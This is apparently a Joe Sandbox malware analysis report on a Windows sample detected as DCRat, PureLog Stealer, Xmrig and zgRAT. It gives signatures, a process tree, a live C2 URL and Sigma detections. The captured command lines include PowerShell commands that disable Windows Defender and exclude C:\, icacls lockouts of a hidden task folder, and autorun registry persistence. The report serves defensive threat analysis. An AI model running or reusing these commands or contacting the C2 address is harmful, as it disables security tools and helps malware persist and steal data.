Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
IYXE4Uz61k.exe

Overview

General Information

Sample name:IYXE4Uz61k.exe
renamed because original name is a hash value
Original sample name:0c1cb4cc583aabc07f0482f7e0767ecf.exe
Analysis ID:1571089
MD5:0c1cb4cc583aabc07f0482f7e0767ecf
SHA1:2b1cc7fdfd2ec5668df1e1f0ff15153f70523e71
SHA256:8ee6e8e2e26826c0d702f32e5cab8a3a551c6b92481b76d1b16b9e7fb3f62607
Tags:CoinMinerexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, Xmrig, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected Xmrig cryptocurrency miner
Yara detected zgRAT
AI detected suspicious sample
Adds extensions / path to Windows Defender exclusion list
Binary is likely a compiled AutoIt script file
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Detected Stratum mining protocol
Disables Windows Defender (via service or powershell)
Drops PE files to the startup folder
Drops executables to the windows directory (C:\Windows) and starts them
Found API chain indicative of debugger detection
Found strings related to Crypto-Mining
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Modifies Windows Defender protection settings
Potentially malicious time measurement code found
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates driver files
Creates files inside the system directory
Creates job files (autostart)
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file contains strange resources
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Process Start Locations
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • IYXE4Uz61k.exe (PID: 7348 cmdline: "C:\Users\user\Desktop\IYXE4Uz61k.exe" MD5: 0C1CB4CC583AABC07F0482F7E0767ECF)
    • powershell.exe (PID: 7392 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $True MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7636 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath c:\ MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7828 cmdline: C:\Windows\system32\cmd.exe /c ""C:\programdata\ru.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7880 cmdline: C:\Windows\system32\cmd.exe /K "c:\programdata\st.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chcp.com (PID: 7936 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
        • tasklist.exe (PID: 7952 cmdline: tasklist /FI "IMAGENAME eq Superfetch.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • find.exe (PID: 7960 cmdline: find /I /N "Superfetch.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
        • takeown.exe (PID: 7996 cmdline: takeown /f c:\windows\tasks MD5: A9AB2877AE82A53F5A387B045BF326A4)
        • timeout.exe (PID: 8016 cmdline: TIMEOUT /T 3 /NOBREAK MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
        • powershell.exe (PID: 8068 cmdline: powershell Set-MpPreference -DisableRealtimeMonitoring $True MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 8168 cmdline: powershell Set-MpPreference -ExclusionPath c:\ MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • icacls.exe (PID: 4192 cmdline: icacls "C:\Windows\Tasks" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)" MD5: 2E49585E4E08565F52090B144062F97E)
        • icacls.exe (PID: 3616 cmdline: icacls "C:\Windows\Tasks" /inheritance:e /grant "SYSTEM:(R,REA,RA,RD)" MD5: 2E49585E4E08565F52090B144062F97E)
        • icacls.exe (PID: 5296 cmdline: icacls "C:\Windows\Tasks" /inheritance:e /grant "Administrators:(R,REA,RA,RD)" MD5: 2E49585E4E08565F52090B144062F97E)
        • icacls.exe (PID: 2992 cmdline: icacls "C:\Windows\Tasks" /inheritance:e /grant "Users:(R,REA,RA,RD)" MD5: 2E49585E4E08565F52090B144062F97E)
        • icacls.exe (PID: 5228 cmdline: icacls "C:\Windows\Tasks" /inheritance:e /grant "user:(R,REA,RA,RD)" MD5: 2E49585E4E08565F52090B144062F97E)
        • icacls.exe (PID: 2124 cmdline: icacls "C:\Windows\Tasks" /inheritance:e /grant "user:(R,REA,RA,RD)" MD5: 2E49585E4E08565F52090B144062F97E)
        • icacls.exe (PID: 7244 cmdline: icacls "C:\Windows\Tasks" /inheritance:e /grant "EVERYONE:(R,REA,RA,RD)" MD5: 2E49585E4E08565F52090B144062F97E)
        • timeout.exe (PID: 4144 cmdline: TIMEOUT /T 3 /NOBREAK MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
        • migrate.exe (PID: 7404 cmdline: c:\programdata\migrate.exe -p4432 MD5: 20737946FC89B9DB44F82EAE5AD41ACB)
          • cmd.exe (PID: 7536 cmdline: C:\Windows\system32\cmd.exe /c ""C:\windows\tasks\run.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • timeout.exe (PID: 7516 cmdline: TIMEOUT /T 1 /NOBREAK MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
            • Wmiic.exe (PID: 7716 cmdline: "C:\windows\tasks\wmiic.exe" install WMService IntelConfigService.exe MD5: A18BFE142F059FDB5C041A310339D4FD)
              • conhost.exe (PID: 7728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • timeout.exe (PID: 7804 cmdline: TIMEOUT /T 1 /NOBREAK MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
            • Wmiic.exe (PID: 7644 cmdline: "C:\windows\tasks\wmiic" start WMService MD5: A18BFE142F059FDB5C041A310339D4FD)
              • conhost.exe (PID: 7156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • timeout.exe (PID: 6676 cmdline: TIMEOUT /T 2 /NOBREAK MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
            • net.exe (PID: 2188 cmdline: net start WMService MD5: 31890A7DE89936F922D44D677F681A7F)
              • net1.exe (PID: 2336 cmdline: C:\Windows\system32\net1 start WMService MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
            • 1.exe (PID: 5228 cmdline: "C:\windows\tasks\1.exe" MD5: E94C69B02CC5FB2B03FC32AA55760AAF)
              • wscript.exe (PID: 5316 cmdline: "C:\Windows\System32\WScript.exe" "C:\Windows\mJTDsOcOsyMzGWVl2p4lWXwUrl0TR0B.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
                • cmd.exe (PID: 6112 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Windows\fwJLoWFGhpY.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                  • conhost.exe (PID: 2144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • Bridgeprovider.exe (PID: 4144 cmdline: "C:\Windows/Bridgeprovider.exe" MD5: BF9DDFDD875FA2BADBE94E88A1FC4214)
                    • csc.exe (PID: 5436 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\214ckojv\214ckojv.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
                      • conhost.exe (PID: 7444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 7468 cmdline: TIMEOUT /T 3 /NOBREAK MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • Wmiic.exe (PID: 7384 cmdline: C:\windows\tasks\Wmiic.exe MD5: A18BFE142F059FDB5C041A310339D4FD)
    • conhost.exe (PID: 7896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • IntelConfigService.exe (PID: 7904 cmdline: "IntelConfigService.exe" MD5: 58E4115267B276452EDC1F541E3A8198)
      • Wrap.exe (PID: 7964 cmdline: C:\Windows\Tasks\Wrap.exe MD5: 39ADB356036E91008843B83EFB61131D)
        • conhost.exe (PID: 7996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 8072 cmdline: C:\Windows\system32\cmd.exe /c "C:\Windows\Tasks\ApplicationsFrameHost.exe" --daemonized MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • ApplicationsFrameHost.exe (PID: 2044 cmdline: C:\Windows\Tasks\ApplicationsFrameHost.exe --daemonized MD5: 93CEEF4357070A8DDC0BEAC173547EC1)
      • cmd.exe (PID: 8000 cmdline: C:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "%username%:(R,REA,RA,RD)" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • icacls.exe (PID: 8144 cmdline: icacls C:\Windows\Tasks /deny "user-PC$:(R,REA,RA,RD)" MD5: 48C87E3B3003A2413D6399EA77707F5D)
      • cmd.exe (PID: 4040 cmdline: C:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "Users:(R,REA,RA,RD)" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • icacls.exe (PID: 8180 cmdline: icacls C:\Windows\Tasks /deny "Users:(R,REA,RA,RD)" MD5: 48C87E3B3003A2413D6399EA77707F5D)
      • cmd.exe (PID: 3736 cmdline: C:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "Administrators:(R,REA,RA,RD))" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • icacls.exe (PID: 8156 cmdline: icacls C:\Windows\Tasks /deny "Administrators:(R,REA,RA,RD))" MD5: 48C87E3B3003A2413D6399EA77707F5D)
      • Superfetch.exe (PID: 3220 cmdline: C:\Windows\Tasks\Superfetch.exe MD5: 362FFCE5C7C480702A615F1847191F62)
      • MSTask.exe (PID: 8172 cmdline: C:\Windows\Tasks\MSTask.exe MD5: 92A9C0EF09F955F9F1BCA837D7AA493F)
        • conhost.exe (PID: 6096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • MSTask.exe (PID: 3272 cmdline: C:\Windows\Tasks\MSTask.exe MD5: 92A9C0EF09F955F9F1BCA837D7AA493F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://193.32.162.64/Linelow"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Windows\Tasks\config.jsonJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      C:\Windows\INF\MicrosoftDefenger.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Windows\INF\MicrosoftDefenger.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Windows\Bridgeprovider.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\Windows\Bridgeprovider.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              Click to see the 5 entries

              Memory Dumps

              SourceRuleDescriptionAuthorStrings
              00000035.00000003.1908378022.0000020033251000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                00000035.00000002.4148260496.00000200332C1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                  0000003C.00000003.1921505628.0000000006A67000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    00000035.00000003.2249324527.000002003380A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                      00000035.00000003.2249769366.00000200332C8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                        Click to see the 13 entries

                        Unpacked PEs

                        SourceRuleDescriptionAuthorStrings
                        60.3.1.exe.6ab56f0.0.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                          60.3.1.exe.6ab56f0.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                            60.3.1.exe.6ab06f0.1.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                              60.3.1.exe.6ab06f0.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                                26.3.migrate.exe.93436f7.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                  Click to see the 10 entries

                                  Sigma Signatures

                                  System Summary

                                  barindex
                                  Sigma detected: Execution from Suspicious Folder
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\windows\tasks\wmiic.exe" install WMService IntelConfigService.exe, CommandLine: "C:\windows\tasks\wmiic.exe" install WMService IntelConfigService.exe, CommandLine|base64offset|contains: {-jY, Image: C:\Windows\Tasks\Wmiic.exe, NewProcessName: C:\Windows\Tasks\Wmiic.exe, OriginalFileName: C:\Windows\Tasks\Wmiic.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\windows\tasks\run.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7536, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\windows\tasks\wmiic.exe" install WMService IntelConfigService.exe, ProcessId: 7716, ProcessName: Wmiic.exe
                                  Sigma detected: Files With System Process Name In Unsuspected Locations
                                  Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ProcessId: 5436, TargetFilename: c:\Windows\System32\SecurityHealthSystray.exe
                                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $True, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $True, CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\IYXE4Uz61k.exe", ParentImage: C:\Users\user\Desktop\IYXE4Uz61k.exe, ParentProcessId: 7348, ParentProcessName: IYXE4Uz61k.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $True, ProcessId: 7392, ProcessName: powershell.exe
                                  Sigma detected: Powershell Defender Disable Scan Feature
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $True, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $True, CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\IYXE4Uz61k.exe", ParentImage: C:\Users\user\Desktop\IYXE4Uz61k.exe, ParentProcessId: 7348, ParentProcessName: IYXE4Uz61k.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $True, ProcessId: 7392, ProcessName: powershell.exe
                                  Sigma detected: CurrentVersion Autorun Keys Modification
                                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\windows\inf\MicrosoftDefenger.exe", EventID: 13, EventType: SetValue, Image: C:\Windows\Bridgeprovider.exe, ProcessId: 4144, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftDefenger
                                  Sigma detected: CurrentVersion NT Autorun Keys Modification
                                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\windows\inf\MicrosoftDefenger.exe", EventID: 13, EventType: SetValue, Image: C:\Windows\Bridgeprovider.exe, ProcessId: 4144, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                                  Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\214ckojv\214ckojv.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\214ckojv\214ckojv.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows/Bridgeprovider.exe", ParentImage: C:\Windows\Bridgeprovider.exe, ParentProcessId: 4144, ParentProcessName: Bridgeprovider.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\214ckojv\214ckojv.cmdline", ProcessId: 5436, ProcessName: csc.exe
                                  Sigma detected: Powershell Defender Exclusion
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath c:\, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath c:\, CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\IYXE4Uz61k.exe", ParentImage: C:\Users\user\Desktop\IYXE4Uz61k.exe, ParentProcessId: 7348, ParentProcessName: IYXE4Uz61k.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath c:\, ProcessId: 7636, ProcessName: powershell.exe
                                  Sigma detected: Startup Folder File Write
                                  Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 7536, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\MicrosoftPrt.exe
                                  Sigma detected: Suspicious Process Start Locations
                                  Source: Process startedAuthor: juju4, Jonhnathan Ribeiro, oscd.community: Data: Command: "C:\windows\tasks\wmiic.exe" install WMService IntelConfigService.exe, CommandLine: "C:\windows\tasks\wmiic.exe" install WMService IntelConfigService.exe, CommandLine|base64offset|contains: {-jY, Image: C:\Windows\Tasks\Wmiic.exe, NewProcessName: C:\Windows\Tasks\Wmiic.exe, OriginalFileName: C:\Windows\Tasks\Wmiic.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\windows\tasks\run.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7536, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\windows\tasks\wmiic.exe" install WMService IntelConfigService.exe, ProcessId: 7716, ProcessName: Wmiic.exe
                                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Windows\mJTDsOcOsyMzGWVl2p4lWXwUrl0TR0B.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Windows\mJTDsOcOsyMzGWVl2p4lWXwUrl0TR0B.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\windows\tasks\1.exe" , ParentImage: C:\Windows\Tasks\1.exe, ParentProcessId: 5228, ParentProcessName: 1.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Windows\mJTDsOcOsyMzGWVl2p4lWXwUrl0TR0B.vbe" , ProcessId: 5316, ProcessName: wscript.exe
                                  Sigma detected: Dynamic CSharp Compile Artefact
                                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\Bridgeprovider.exe, ProcessId: 4144, TargetFilename: C:\Users\user\AppData\Local\Temp\214ckojv\214ckojv.cmdline
                                  Sigma detected: Net.exe Execution
                                  Source: Process startedAuthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net start WMService, CommandLine: net start WMService, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\windows\tasks\run.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7536, ParentProcessName: cmd.exe, ProcessCommandLine: net start WMService, ProcessId: 2188, ProcessName: net.exe
                                  Sigma detected: Non Interactive PowerShell Process Spawned
                                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $True, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $True, CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\IYXE4Uz61k.exe", ParentImage: C:\Users\user\Desktop\IYXE4Uz61k.exe, ParentProcessId: 7348, ParentProcessName: IYXE4Uz61k.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $True, ProcessId: 7392, ProcessName: powershell.exe
                                  Sigma detected: Start Windows Service Via Net.EXE
                                  Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: net start WMService, CommandLine: net start WMService, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\windows\tasks\run.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7536, ParentProcessName: cmd.exe, ProcessCommandLine: net start WMService, ProcessId: 2188, ProcessName: net.exe

                                  Data Obfuscation

                                  barindex
                                  Sigma detected: Dot net compiler compiles file from suspicious location
